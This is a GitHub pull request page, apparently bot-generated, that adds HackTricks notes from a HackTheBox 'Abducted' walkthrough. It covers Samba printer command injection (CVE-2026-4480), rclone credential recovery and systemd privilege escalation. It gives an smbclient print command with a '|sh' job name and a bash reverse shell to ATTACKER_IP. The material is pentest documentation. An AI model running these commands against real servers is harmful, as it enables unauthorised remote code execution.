HTB Abducted Samba CVE-2026-4480 RCE, rclone Credential Reco...#2476
Open
carlospolop wants to merge 1 commit into
Open
HTB Abducted Samba CVE-2026-4480 RCE, rclone Credential Reco...#2476carlospolop wants to merge 1 commit into
carlospolop wants to merge 1 commit into
Conversation
Collaborator
Author
🔗 Additional ContextOriginal Blog Post: https://0xdf.gitlab.io/2026/07/07/htb-abducted.html Content Categories: Based on the analysis, this content was categorized under "Network Services Pentesting > 139,445 - Pentesting SMB for Samba printer CVE-2026-4480 and wide links/force user abuse; Linux Privilege Escalation for writable systemd drop-in directories; optionally Linux Post-Exploitation or generic credential recovery notes for rclone config password recovery". Repository Maintenance:
Review Notes:
Bot Version: HackTricks News Bot v1.0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
🎯 Content Summary
The blog is a HackTheBox Linux walkthrough for Abducted, a Samba-focused machine. The exploitation chain is: unauthenticated Samba printer command injection via CVE-2026-4480 to get code execution as
nobody, readable rclone backup credentials to becomescott, Sambawide linksplusforce userabuse to write intomarcus' home directory, and finally local root through a writable systemdsmbd.service.ddro...🔧 Technical Details
Samba printer command injection through
%J: If a Samba printer share uses a shell-basedprint commandcontaining%J, the client-controlled print job name / description may be substituted directly into the command line. In CVE-2026-4480, Samba does not properly escape shell metacharacters in this value; the blog notes only single quotes are replaced with underscores. If the job name is|shor|bash, the server-side command can become a pipeline that feeds the uploaded spool file to a shell. Minimal exploitation is: create a local file named|shcontaining commands, then submit it withsmbclient //TARGET/PRINTER -N -c 'print "|sh"'. For a reverse shell, use a file named|bashcontainingbash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1and submit it withprint "|bash".Triggering Samba print exploitation through spoolss RPC: The sa...
🤖 Agent Actions
Run continuation status:
src/network-services-pentesting/pentesting-smb/README.md## ReferencesNo further repository changes are needed right now. The run remains paused and ready for final reporting when requested.
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.